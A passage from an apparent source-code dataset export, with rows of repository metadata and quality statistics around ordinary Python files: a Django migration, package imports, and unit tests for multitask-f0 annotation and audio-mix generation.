| 9
| 52
| 3.555556
| 0.777778
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.051282
| 0.25
| 52
| 2
| 27
| 26
| 0.769231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
0cc568d9e0c6f21fee456a7266078b1620ce9fa5
| 1,165
|
py
|
Python
|
app/grandchallenge/challenges/migrations/0029_auto_20200918_1413.py
|
pushpanjalip/grand-challenge.org
|
607a30c9fe0e603b79f7b49dc9efeb48a484ebfc
|
[
"Apache-2.0"
] | null | null | null |
app/grandchallenge/challenges/migrations/0029_auto_20200918_1413.py
|
pushpanjalip/grand-challenge.org
|
607a30c9fe0e603b79f7b49dc9efeb48a484ebfc
|
[
"Apache-2.0"
] | null | null | null |
app/grandchallenge/challenges/migrations/0029_auto_20200918_1413.py
|
pushpanjalip/grand-challenge.org
|
607a30c9fe0e603b79f7b49dc9efeb48a484ebfc
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 3.0.10 on 2020-09-18 14:13
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("challenges", "0028_auto_20200917_1113"),
]
operations = [
migrations.RemoveField(
model_name="challenge", name="publication_citation_count",
),
migrations.RemoveField(
model_name="challenge", name="publication_google_scholar_id",
),
migrations.RemoveField(
model_name="challenge", name="publication_journal_name",
),
migrations.RemoveField(
model_name="challenge", name="publication_url",
),
migrations.RemoveField(
model_name="externalchallenge", name="publication_citation_count",
),
migrations.RemoveField(
model_name="externalchallenge",
name="publication_google_scholar_id",
),
migrations.RemoveField(
model_name="externalchallenge", name="publication_journal_name",
),
migrations.RemoveField(
model_name="externalchallenge", name="publication_url",
),
]
| 29.871795
| 78
| 0.620601
| 100
| 1,165
| 6.96
| 0.38
| 0.241379
| 0.298851
| 0.344828
| 0.778736
| 0.778736
| 0.778736
| 0.5
| 0.172414
| 0
| 0
| 0.037915
| 0.275536
| 1,165
| 38
| 79
| 30.657895
| 0.78673
| 0.039485
| 0
| 0.5
| 1
| 0
| 0.290958
| 0.162041
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.03125
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0cf6d9df7bf30aa3202bb6a450296d304eda30df
| 162
|
py
|
Python
|
taurex/data/profiles/pressure/__init__.py
|
ucl-exoplanets/TauREx3_public
|
cf8da465448df44c3c4dcc2cd0002ef34edd3920
|
[
"BSD-3-Clause"
] | 10
|
2019-12-18T09:19:16.000Z
|
2021-06-21T11:02:06.000Z
|
taurex/data/profiles/pressure/__init__.py
|
ucl-exoplanets/TauREx3_public
|
cf8da465448df44c3c4dcc2cd0002ef34edd3920
|
[
"BSD-3-Clause"
] | 10
|
2020-03-24T18:02:15.000Z
|
2021-08-23T20:32:09.000Z
|
taurex/data/profiles/pressure/__init__.py
|
ucl-exoplanets/TauREx3_public
|
cf8da465448df44c3c4dcc2cd0002ef34edd3920
|
[
"BSD-3-Clause"
] | 8
|
2020-03-26T14:16:42.000Z
|
2021-12-18T22:11:25.000Z
|
from .pressureprofile import SimplePressureProfile, PressureProfile
from .arraypressure import ArrayPressureProfile
from .filepressure import FilePressureProfile
| 40.5
| 67
| 0.895062
| 13
| 162
| 11.153846
| 0.615385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.080247
| 162
| 3
| 68
| 54
| 0.973154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0b23c2d24c2930d57cd73d7f5f0fa032271cc2af
| 141
|
py
|
Python
|
tests/base.py
|
nephila/djangocms-apphook-setup
|
615491dcb4c9383f346abfa8f79f7f5309722405
|
[
"BSD-3-Clause"
] | 9
|
2015-10-25T18:44:36.000Z
|
2020-12-28T18:20:38.000Z
|
tests/base.py
|
nephila/djangocms-apphook-setup
|
615491dcb4c9383f346abfa8f79f7f5309722405
|
[
"BSD-3-Clause"
] | 13
|
2015-12-20T13:01:10.000Z
|
2020-12-02T11:18:18.000Z
|
tests/base.py
|
nephila/djangocms-apphook-setup
|
615491dcb4c9383f346abfa8f79f7f5309722405
|
[
"BSD-3-Clause"
] | 5
|
2016-09-29T05:23:44.000Z
|
2021-07-08T07:15:56.000Z
|
from app_helper.base_test import BaseTestCase
class BaseTest(BaseTestCase):
"""
Base class with utility function
"""
pass
| 14.1
| 45
| 0.695035
| 16
| 141
| 6
| 0.8125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.234043
| 141
| 9
| 46
| 15.666667
| 0.888889
| 0.22695
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
0b73cb8219a3db90762cae657f1fe62ded68d6f2
| 29
|
py
|
Python
|
src/SDA_Turki/__init__.py
|
TurkiBt/SDA-Turki
|
b3b541ed7bfaf7099d28491a11872e7964fca858
|
[
"MIT"
] | null | null | null |
src/SDA_Turki/__init__.py
|
TurkiBt/SDA-Turki
|
b3b541ed7bfaf7099d28491a11872e7964fca858
|
[
"MIT"
] | null | null | null |
src/SDA_Turki/__init__.py
|
TurkiBt/SDA-Turki
|
b3b541ed7bfaf7099d28491a11872e7964fca858
|
[
"MIT"
] | null | null | null |
from .my_class import MyClass
| 29
| 29
| 0.862069
| 5
| 29
| 4.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103448
| 29
| 1
| 29
| 29
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0b82437b4d3ddd352067362346b6cd314e357711
| 38,515
|
py
|
Python
|
tests/test_compute_multitask_data.py
|
jollyjonson/multitask-f0
|
0f33475599bd69acce8cd9a1a96f20fc1c8b7701
|
[
"MIT"
] | 10
|
2019-01-08T02:31:12.000Z
|
2021-04-26T09:52:46.000Z
|
tests/test_compute_multitask_data.py
|
jollyjonson/multitask-f0
|
0f33475599bd69acce8cd9a1a96f20fc1c8b7701
|
[
"MIT"
] | 1
|
2019-03-11T18:12:07.000Z
|
2019-03-11T18:12:07.000Z
|
tests/test_compute_multitask_data.py
|
jollyjonson/multitask-f0
|
0f33475599bd69acce8cd9a1a96f20fc1c8b7701
|
[
"MIT"
] | 2
|
2019-03-11T12:23:08.000Z
|
2019-06-20T15:58:06.000Z
|
import unittest
import os
import numpy as np
import medleydb as mdb
from deepsalience import compute_multitask_data as CMD
class TestMultiF0ToTimeFreq(unittest.TestCase):
def test_default(self):
times = [0.0, 0.1, 0.2, 0.8]
freqs = [[], [200.1, 207.7], [], [82.1]]
actual_times, actual_freqs = CMD.multif0_to_timefreq(times, freqs)
expected_times = [0.1, 0.1, 0.8]
expected_freqs = [200.1, 207.7, 82.1]
self.assertEqual(expected_times, actual_times)
self.assertEqual(expected_freqs, actual_freqs)
class TestGetReplaceInfo(unittest.TestCase):
def test_one(self):
replace_path = os.path.join(
"/Users/rabitt/Dropbox/piano_guitar_resynth",
"vocalists_replace"
)
mtrack = mdb.MultiTrack('AHa_TakeOnMe')
(actual_annotations,
actual_altindices,
actual_indicies) = CMD.get_replace_info(mtrack, replace_path)
expected_annotations = {
2: {
'tags': ['multif0', 'vocal', 'melody'],
'times': [11.104943311],
'freqs': [150.758]
}
}
expected_altindices = {
2: os.path.join(replace_path, 'AHa_TakeOnMe_STEM_02_replace.wav')
}
expected_indices = [2]
self.assertEqual(expected_annotations.keys(), actual_annotations.keys())
for k in actual_annotations.keys():
self.assertEqual(
expected_annotations[k]['tags'],
actual_annotations[k]['tags']
)
self.assertEqual(
expected_annotations[k]['times'][0],
actual_annotations[k]['times'][0]
)
self.assertEqual(
expected_annotations[k]['freqs'][0],
actual_annotations[k]['freqs'][0]
)
self.assertEqual(expected_altindices, actual_altindices)
self.assertEqual(expected_indices, actual_indicies)
def test_two(self):
mtrack = mdb.MultiTrack('ArcadeFire_BlackMirror')
replace_path = os.path.join(
"/Users/rabitt/Dropbox/piano_guitar_resynth",
"vocalists_replace"
)
(actual_annotations,
actual_altindices,
actual_indicies) = CMD.get_replace_info(mtrack, replace_path)
expected_annotations = {}
expected_altindices = {}
expected_indices = []
self.assertEqual(expected_annotations.keys(), actual_annotations.keys())
for k in actual_annotations.keys():
self.assertEqual(
expected_annotations[k]['tags'],
actual_annotations[k]['tags']
)
self.assertEqual(
expected_annotations[k]['times'][0],
actual_annotations[k]['times'][0]
)
self.assertEqual(
expected_annotations[k]['freqs'][0],
actual_annotations[k]['freqs'][0]
)
self.assertEqual(expected_altindices, actual_altindices)
self.assertEqual(expected_indices, actual_indicies)
class TestGetResynthInfo(unittest.TestCase):
def test_one(self):
resynth_path = '/Users/rabitt/Dropbox/piano_guitar_resynth/resynth'
mtrack = mdb.MultiTrack('AHa_TakeOnMe')
(actual_annotations,
actual_altindices,
actual_indicies_guitar,
actual_indices_piano) = CMD.get_resynth_info(
mtrack, resynth_path, [2])
expected_annotations = {
1: {
'tags': ['multif0'],
'times': [119.4550566893424],
'freqs': [830.60939515989025]
},
3: {
'tags': ['multif0'],
'times': [11.435827664399094],
'freqs': [123.47082531403103]
},
4: {
'tags': ['multif0', 'guitar'],
'times': [49.458503401360545],
'freqs': [293.66476791740757]
},
6: {
'tags': ['multif0'],
'times': [5.5495691609977325],
'freqs': [246.94165062806206]
}
}
expected_altindices = {
1: os.path.join(resynth_path, 'AHa_TakeOnMe_STEM_01_resynth.wav'),
3: os.path.join(resynth_path, 'AHa_TakeOnMe_STEM_03_resynth.wav'),
4: os.path.join(resynth_path, 'AHa_TakeOnMe_STEM_04_resynth.wav'),
6: os.path.join(resynth_path, 'AHa_TakeOnMe_STEM_06_resynth.wav')
}
expected_indices_guitar = [4]
expected_indices_piano = [1, 3, 6]
self.assertEqual(expected_annotations.keys(), actual_annotations.keys())
for k in actual_annotations.keys():
self.assertEqual(
expected_annotations[k]['tags'],
actual_annotations[k]['tags']
)
self.assertEqual(
expected_annotations[k]['times'][0],
actual_annotations[k]['times'][0]
)
self.assertEqual(
expected_annotations[k]['freqs'][0],
actual_annotations[k]['freqs'][0]
)
self.assertEqual(expected_altindices, actual_altindices)
self.assertEqual(expected_indices_guitar, actual_indicies_guitar)
self.assertEqual(expected_indices_piano, actual_indices_piano)
def test_two(self):
resynth_path = '/Users/rabitt/Dropbox/piano_guitar_resynth/resynth'
mtrack = mdb.MultiTrack('Adele_SomeoneLikeYou')
(actual_annotations,
actual_altindices,
actual_indicies_guitar,
actual_indices_piano) = CMD.get_resynth_info(
mtrack, resynth_path, [2])
expected_annotations = {
1: {
'tags': ['multif0', 'piano'],
'times': [0.83591836734693881],
'freqs': [164.81377845643496]
}
}
expected_altindices = {
1: os.path.join(
resynth_path, 'Adele_SomeoneLikeYou_STEM_01_resynth.wav')
}
expected_indices_guitar = []
expected_indices_piano = [1]
self.assertEqual(expected_annotations.keys(), actual_annotations.keys())
for k in actual_annotations.keys():
self.assertEqual(
expected_annotations[k]['tags'],
actual_annotations[k]['tags']
)
self.assertEqual(
expected_annotations[k]['times'][0],
actual_annotations[k]['times'][0]
)
self.assertEqual(
expected_annotations[k]['freqs'][0],
actual_annotations[k]['freqs'][0]
)
self.assertEqual(expected_altindices, actual_altindices)
self.assertEqual(expected_indices_guitar, actual_indicies_guitar)
self.assertEqual(expected_indices_piano, actual_indices_piano)
def test_three(self):
mtrack = mdb.MultiTrack('ArcadeFire_BlackMirror')
resynth_path = '/Users/rabitt/Dropbox/piano_guitar_resynth/resynth'
stem_indices = []
(actual_annotations,
actual_altindices,
actual_indicies_guitar,
actual_indices_piano) = CMD.get_resynth_info(
mtrack, resynth_path, stem_indices)
expected_annotations = {
2: {
'tags': ['multif0', 'guitar'],
'times': [10.832108843537416],
'freqs': [116.54094037952248]
},
7: {
'tags': ['multif0', 'guitar'],
'times': [11.122358276643991],
'freqs': [116.54094037952248]
}
}
expected_altindices = {
2: os.path.join(
resynth_path, 'ArcadeFire_BlackMirror_STEM_02_resynth.wav'),
7: os.path.join(
resynth_path, 'ArcadeFire_BlackMirror_STEM_07_resynth.wav')
}
expected_indices_guitar = [2, 7]
expected_indices_piano = []
self.assertEqual(expected_annotations.keys(), actual_annotations.keys())
for k in actual_annotations.keys():
self.assertEqual(
expected_annotations[k]['tags'],
actual_annotations[k]['tags']
)
self.assertEqual(
expected_annotations[k]['times'][0],
actual_annotations[k]['times'][0]
)
self.assertEqual(
expected_annotations[k]['freqs'][0],
actual_annotations[k]['freqs'][0]
)
self.assertEqual(expected_altindices, actual_altindices)
self.assertEqual(expected_indices_guitar, actual_indicies_guitar)
self.assertEqual(expected_indices_piano, actual_indices_piano)
class TestGetOrigStemInfo(unittest.TestCase):
def test_one(self):
mtrack = mdb.MultiTrack('AcDc_BackInBlack')
stem_indices = [2, 4]
(actual_annotations,
actual_annot_activity,
actual_indices) = CMD.get_orig_stem_info(mtrack, stem_indices)
expected_annotations = {
3: {
'tags': ['multif0', 'bass'],
'times': [5.294149660],
'freqs': [85.2297]
},
6: {
'tags': ['multif0', 'vocal', 'melody'],
'times': [25.094965986],
'freqs': [689.325]
}
}
expected_annot_activity = {3: None, 6: None}
expected_indices = [3, 5, 6]
self.assertEqual(expected_annotations.keys(), actual_annotations.keys())
for k in actual_annotations.keys():
self.assertEqual(
expected_annotations[k]['tags'],
actual_annotations[k]['tags']
)
self.assertEqual(
expected_annotations[k]['times'][0],
actual_annotations[k]['times'][0]
)
self.assertEqual(
expected_annotations[k]['freqs'][0],
actual_annotations[k]['freqs'][0]
)
self.assertEqual(expected_annot_activity, actual_annot_activity)
self.assertEqual(expected_indices, actual_indices)
def test_two(self):
mtrack = mdb.MultiTrack('ArcadeFire_BlackMirror')
stem_indices = [2, 7]
(actual_annotations,
actual_annot_activity,
actual_indices) = CMD.get_orig_stem_info(mtrack, stem_indices)
expected_annotations = {
4: {
'tags': ['multif0', 'bass'],
'times': [0.058049887],
'freqs': [0.0]
},
6: {
'tags': ['multif0', 'vocal', 'melody'],
'times': [26.790022676],
'freqs': [162.773]
}
}
expected_annot_activity = {4: None, 6: None}
expected_indices = [3, 4, 6]
self.assertEqual(expected_annotations.keys(), actual_annotations.keys())
for k in actual_annotations.keys():
self.assertEqual(
expected_annotations[k]['tags'],
actual_annotations[k]['tags']
)
self.assertEqual(
expected_annotations[k]['times'][0],
actual_annotations[k]['times'][0]
)
self.assertEqual(
expected_annotations[k]['freqs'][0],
actual_annotations[k]['freqs'][0]
)
self.assertEqual(expected_annot_activity, actual_annot_activity)
self.assertEqual(expected_indices, actual_indices)
def test_three(self):
mtrack = mdb.MultiTrack('MusicDelta_BebopJazz')
stem_indices = [3]
(actual_annotations,
actual_annot_activity,
actual_indices) = CMD.get_orig_stem_info(mtrack, stem_indices)
expected_annotations = {
2: {
'tags': ['multif0', 'bass'],
'times': [0.632743764],
'freqs': [86.5701]
},
4: {
'tags': ['multif0', 'melody'],
'times': [0.429569160],
'freqs': [190.852]
},
5: {
'tags': ['multif0', 'melody'],
'times': [0.400544217],
'freqs': [380.532]
}
}
expected_annot_activity = {2: None, 4: [0.5], 5: [0.5]}
expected_indices = [1, 2, 4, 5]
self.assertEqual(expected_annotations.keys(), actual_annotations.keys())
for k in actual_annotations.keys():
self.assertEqual(
expected_annotations[k]['tags'],
actual_annotations[k]['tags']
)
self.assertEqual(
expected_annotations[k]['times'][0],
actual_annotations[k]['times'][0]
)
self.assertEqual(
expected_annotations[k]['freqs'][0],
actual_annotations[k]['freqs'][0]
)
self.assertEqual(expected_annot_activity[2], actual_annot_activity[2])
self.assertEqual(
expected_annot_activity[4][0], actual_annot_activity[4][0])
self.assertEqual(
expected_annot_activity[5][0], actual_annot_activity[5][0])
self.assertEqual(expected_indices, actual_indices)
class TestSaveAnnotation(unittest.TestCase):
def test_empty(self):
actual = CMD.save_annotation([], [], 'data/save_test.csv')
expected = None
self.assertEqual(expected, actual)
def test_nonempty(self):
actual = CMD.save_annotation(
[0.5, 0.5, 0.5, 1.5], [200.0, 0.0, 201, 400],
'data/save_test.csv')
expected = 'data/save_test.csv'
self.assertEqual(expected, actual)
self.assertTrue(os.path.exists(expected))
os.remove(expected)
class TestCreateAnnotations(unittest.TestCase):
def test_one(self):
save_dir = 'asdf/fdasa'
track_id = 'Artist_Title'
stem_annotations = {
2: {
'tags': ['multif0', 'bass'],
'times': [0.0, 0.1, 0.2],
'freqs': [100, 100, 100]
},
3: {
'tags': ['multif0', 'piano'],
'times': [0.0, 0.1, 0.2],
'freqs': [200, 200, 200]
},
7: {
'tags': ['multif0', 'guitar'],
'times': [1.0, 1.0, 1.1, 1.2],
'freqs': [100, 200, 100, 100]
},
9: {
'tags': ['multif0', 'melody'],
'times': [0.2, 0.3, 0.4],
'freqs': [100, 100, 100]
},
1: {
'tags': ['multif0', 'vocal'],
'times': [1.0, 1.1, 1.2],
'freqs': [400, 400, 400]
}
}
actual = CMD.create_annotations(save_dir, track_id, stem_annotations)
expected = {
'multif0': {
'times': [
1.0, 1.1, 1.2, 0.0, 0.1, 0.2, 0.0, 0.1, 0.2,
1.0, 1.0, 1.1, 1.2, 0.2, 0.3, 0.4],
'freqs': [
400, 400, 400, 100, 100, 100, 200, 200, 200,
100, 200, 100, 100, 100, 100, 100],
'path': "asdf/fdasa/Artist_Title_multif0_annotation.txt"
},
'multif0_noguitar': {
'times': [
1.0, 1.1, 1.2, 0.0, 0.1, 0.2,
0.0, 0.1, 0.2, 0.2, 0.3, 0.4],
'freqs': [
400, 400, 400, 100, 100, 100,
200, 200, 200, 100, 100, 100],
'path':
"asdf/fdasa/Artist_Title_multif0_noguitar_annotation.txt"
},
'multif0_nosynth': {
'times': [1.0, 1.1, 1.2, 0.0, 0.1, 0.2, 0.2, 0.3, 0.4],
'freqs': [400, 400, 400, 100, 100, 100, 100, 100, 100],
'path': "asdf/fdasa/Artist_Title_multif0_nosynth_annotation.txt"
},
'melody': {
'times': [0.2, 0.3, 0.4],
'freqs': [100, 100, 100],
'path': "asdf/fdasa/Artist_Title_melody_annotation.txt"
},
'vocal': {
'times': [1.0, 1.1, 1.2],
'freqs': [400, 400, 400],
'path': "asdf/fdasa/Artist_Title_vocal_annotation.txt"
},
'bass': {
'times': [0.0, 0.1, 0.2],
'freqs': [100, 100, 100],
'path': "asdf/fdasa/Artist_Title_bass_annotation.txt"
},
'piano': {
'times': [0.0, 0.1, 0.2],
'freqs': [200, 200, 200],
'path': "asdf/fdasa/Artist_Title_piano_annotation.txt"
},
'guitar': {
'times': [1.0, 1.0, 1.1, 1.2],
'freqs': [100, 200, 100, 100],
'path': "asdf/fdasa/Artist_Title_guitar_annotation.txt"
}
}
self.assertEqual(sorted(expected.keys()), sorted(actual.keys()))
for key in actual.keys():
self.assertEqual(expected[key], actual[key])
class TestCreateAnnotationSavePairs(unittest.TestCase):
def test_one(self):
annotations = {
'multif0': {
'times': [
1.0, 1.1, 1.2, 0.0, 0.1, 0.2, 0.0, 0.1, 0.2,
1.0, 1.0, 1.1, 1.2, 0.2, 0.3, 0.4],
'freqs': [
400, 400, 400, 100, 100, 100, 200, 200, 200,
100, 200, 100, 100, 100, 100, 100],
'path': "data/Artist_Title_multif0_annotation.txt"
},
'multif0_noguitar': {
'times': [
1.0, 1.1, 1.2, 0.0, 0.1, 0.2,
0.0, 0.1, 0.2, 0.2, 0.3, 0.4],
'freqs': [
400, 400, 400, 100, 100, 100,
200, 200, 200, 100, 100, 100],
'path':
"data/Artist_Title_multif0_noguitar_annotation.txt"
},
'multif0_nosynth': {
'times': [1.0, 1.1, 1.2, 0.0, 0.1, 0.2, 0.2, 0.3, 0.4],
'freqs': [400, 400, 400, 100, 100, 100, 100, 100, 100],
'path': "data/Artist_Title_multif0_nosynth_annotation.txt"
},
'melody': {
'times': [0.2, 0.3, 0.4],
'freqs': [100, 100, 100],
'path': "data/Artist_Title_melody_annotation.txt"
},
'vocal': {
'times': [1.0, 1.1, 1.2],
'freqs': [400, 400, 400],
'path': "data/Artist_Title_vocal_annotation.txt"
},
'bass': {
'times': [0.0, 0.1, 0.2],
'freqs': [100, 100, 100],
'path': "data/Artist_Title_bass_annotation.txt"
},
'piano': {
'times': [0.0, 0.1, 0.2],
'freqs': [200, 200, 200],
'path': "data/Artist_Title_piano_annotation.txt"
},
'guitar': {
'times': [1.0, 1.0, 1.1, 1.2],
'freqs': [100, 200, 100, 100],
'path': "data/Artist_Title_guitar_annotation.txt"
}
}
mix_path = 'Fakemix.wav'
mix_path_noguitar = 'Fakemix_noguitar.wav'
mix_path_nosynth = 'Fakemix_nosynth.wav'
actual = CMD.create_annotation_save_pairs(
annotations, mix_path, mix_path_noguitar,
mix_path_nosynth
)
expected = {
'Fakemix.wav': {
'multif0': "data/Artist_Title_multif0_annotation.txt",
'guitar': "data/Artist_Title_guitar_annotation.txt",
'piano': "data/Artist_Title_piano_annotation.txt",
'vocal': "data/Artist_Title_vocal_annotation.txt",
'melody': "data/Artist_Title_melody_annotation.txt",
'bass': "data/Artist_Title_bass_annotation.txt"
},
'Fakemix_noguitar.wav': {
'multif0': "data/Artist_Title_multif0_noguitar_annotation.txt",
'guitar': None,
'piano': "data/Artist_Title_piano_annotation.txt",
'vocal': "data/Artist_Title_vocal_annotation.txt",
'melody': "data/Artist_Title_melody_annotation.txt",
'bass': "data/Artist_Title_bass_annotation.txt"
},
'Fakemix_nosynth.wav': {
'multif0': "data/Artist_Title_multif0_nosynth_annotation.txt",
'guitar': None,
'piano': None,
'vocal': "data/Artist_Title_vocal_annotation.txt",
'melody': "data/Artist_Title_melody_annotation.txt",
'bass': "data/Artist_Title_bass_annotation.txt"
},
}
self.assertEqual(sorted(expected.keys()), sorted(actual.keys()))
files = []
for key in actual.keys():
self.assertEqual(
sorted(expected[key].keys()), sorted(actual[key].keys()))
for subkey in actual[key].keys():
self.assertEqual(expected[key][subkey], actual[key][subkey])
if actual[key][subkey] is not None:
self.assertTrue(os.path.exists(actual[key][subkey]))
files.append(actual[key][subkey])
files = list(set(files))
for f in files:
os.remove(f)
def test_two(self):
annotations = {
'multif0': {
'times': [
1.0, 1.1, 1.2, 0.0, 0.1, 0.2, 0.0, 0.1, 0.2,
1.0, 1.0, 1.1, 1.2, 0.2, 0.3, 0.4],
'freqs': [
400, 400, 400, 100, 100, 100, 200, 200, 200,
100, 200, 100, 100, 100, 100, 100],
'path': "data/Artist_Title_multif0_annotation.txt"
},
'multif0_noguitar': {
'times': [
1.0, 1.1, 1.2, 0.0, 0.1, 0.2,
0.0, 0.1, 0.2, 0.2, 0.3, 0.4],
'freqs': [
400, 400, 400, 100, 100, 100,
200, 200, 200, 100, 100, 100],
'path':
"data/Artist_Title_multif0_noguitar_annotation.txt"
},
'multif0_nosynth': {
'times': [1.0, 1.1, 1.2, 0.0, 0.1, 0.2, 0.2, 0.3, 0.4],
'freqs': [400, 400, 400, 100, 100, 100, 100, 100, 100],
'path': "data/Artist_Title_multif0_nosynth_annotation.txt"
},
'melody': {
'times': [0.2, 0.3, 0.4],
'freqs': [100, 100, 100],
'path': "data/Artist_Title_melody_annotation.txt"
},
'vocal': {
'times': [1.0, 1.1, 1.2],
'freqs': [400, 400, 400],
'path': "data/Artist_Title_vocal_annotation.txt"
},
'piano': {
'times': [0.0, 0.1, 0.2],
'freqs': [200, 200, 200],
'path': "data/Artist_Title_piano_annotation.txt"
},
'guitar': {
'times': [1.0, 1.0, 1.1, 1.2],
'freqs': [100, 200, 100, 100],
'path': "data/Artist_Title_guitar_annotation.txt"
}
}
mix_path = 'Fakemix.wav'
mix_path_noguitar = 'Fakemix_noguitar.wav'
mix_path_nosynth = 'Fakemix_nosynth.wav'
actual = CMD.create_annotation_save_pairs(
annotations, mix_path, mix_path_noguitar,
mix_path_nosynth
)
expected = {
'Fakemix.wav': {
'multif0': "data/Artist_Title_multif0_annotation.txt",
'guitar': "data/Artist_Title_guitar_annotation.txt",
'piano': "data/Artist_Title_piano_annotation.txt",
'vocal': "data/Artist_Title_vocal_annotation.txt",
'melody': "data/Artist_Title_melody_annotation.txt"
},
'Fakemix_noguitar.wav': {
'multif0': "data/Artist_Title_multif0_noguitar_annotation.txt",
'guitar': None,
'piano': "data/Artist_Title_piano_annotation.txt",
'vocal': "data/Artist_Title_vocal_annotation.txt",
'melody': "data/Artist_Title_melody_annotation.txt"
},
'Fakemix_nosynth.wav': {
'multif0': "data/Artist_Title_multif0_nosynth_annotation.txt",
'guitar': None,
'piano': None,
'vocal': "data/Artist_Title_vocal_annotation.txt",
'melody': "data/Artist_Title_melody_annotation.txt"
}
}
self.assertEqual(sorted(expected.keys()), sorted(actual.keys()))
files = []
for key in actual.keys():
self.assertEqual(
sorted(expected[key].keys()), sorted(actual[key].keys()))
for subkey in actual[key].keys():
self.assertEqual(expected[key][subkey], actual[key][subkey])
if actual[key][subkey] is not None:
self.assertTrue(os.path.exists(actual[key][subkey]))
files.append(actual[key][subkey])
files = list(set(files))
for f in files:
os.remove(f)
class TestGenerateFilteredStems(unittest.TestCase):
def test_empty(self):
stem_annot_activity = {}
mtrack = mdb.MultiTrack("MusicDelta_BebopJazz")
save_dir = ""
actual = CMD.generate_filtered_stems(
stem_annot_activity, mtrack, save_dir)
expected = {}
self.assertEqual(expected, actual)
def test_nonempty_one(self):
stem_annot_activity = {1: None, 2: np.ones((20*44100, ))}
mtrack = mdb.MultiTrack("MusicDelta_Reggae")
save_dir = 'data'
actual = CMD.generate_filtered_stems(
stem_annot_activity, mtrack, save_dir)
expected = {2: 'data/MusicDelta_Reggae_STEM_2_alt.wav'}
self.assertEqual(expected, actual)
self.assertTrue(os.path.exists('data/MusicDelta_Reggae_STEM_2_alt.wav'))
os.remove('data/MusicDelta_Reggae_STEM_2_alt.wav')
def test_nonempty_two(self):
stem_annot_activity = {1: None, 2: np.ones((2*44100, ))}
mtrack = mdb.MultiTrack("MusicDelta_Reggae")
save_dir = 'data'
actual = CMD.generate_filtered_stems(
stem_annot_activity, mtrack, save_dir)
expected = {2: 'data/MusicDelta_Reggae_STEM_2_alt.wav'}
self.assertEqual(expected, actual)
self.assertTrue(os.path.exists('data/MusicDelta_Reggae_STEM_2_alt.wav'))
os.remove('data/MusicDelta_Reggae_STEM_2_alt.wav')
class TestCreateMixes(unittest.TestCase):
def test_one(self):
mtrack = mdb.MultiTrack("AHa_TakeOnMe")
mix_path = 'data/test_mix.wav'
mix_path_noguitar = 'data/test_mix_noguitar.wav'
mix_path_nosynth = 'data/test_mix_nosynth.wav'
stem_indices = [1, 2, 3, 4, 5, 6]
stem_indices_guitar = [4]
stem_indices_piano = [1, 3, 6]
resynth_path = '/Users/rabitt/Dropbox/piano_guitar_resynth/resynth'
replace_path = os.path.join(
'/Users/rabitt/Dropbox',
'piano_guitar_resynth/vocalists_replace'
)
altfiles = {
1: os.path.join(resynth_path, "AHa_TakeOnMe_STEM_01_resynth.wav"),
2: os.path.join(replace_path, "AHa_TakeOnMe_STEM_02_replace.wav"),
3: os.path.join(resynth_path, "AHa_TakeOnMe_STEM_03_resynth.wav"),
4: os.path.join(resynth_path, "AHa_TakeOnMe_STEM_04_resynth.wav"),
6: os.path.join(resynth_path, "AHa_TakeOnMe_STEM_06_resynth.wav")
}
(actual_mix,
actual_mix_noguitar,
actual_mix_nosynth) = CMD.create_mixes(
mtrack, mix_path, mix_path_noguitar, mix_path_nosynth,
stem_indices, stem_indices_guitar, stem_indices_piano,
altfiles
)
expected_mix = sorted([
os.path.join(resynth_path, "AHa_TakeOnMe_STEM_01_resynth.wav"),
os.path.join(replace_path, "AHa_TakeOnMe_STEM_02_replace.wav"),
os.path.join(resynth_path, "AHa_TakeOnMe_STEM_03_resynth.wav"),
os.path.join(resynth_path, "AHa_TakeOnMe_STEM_04_resynth.wav"),
os.path.join(
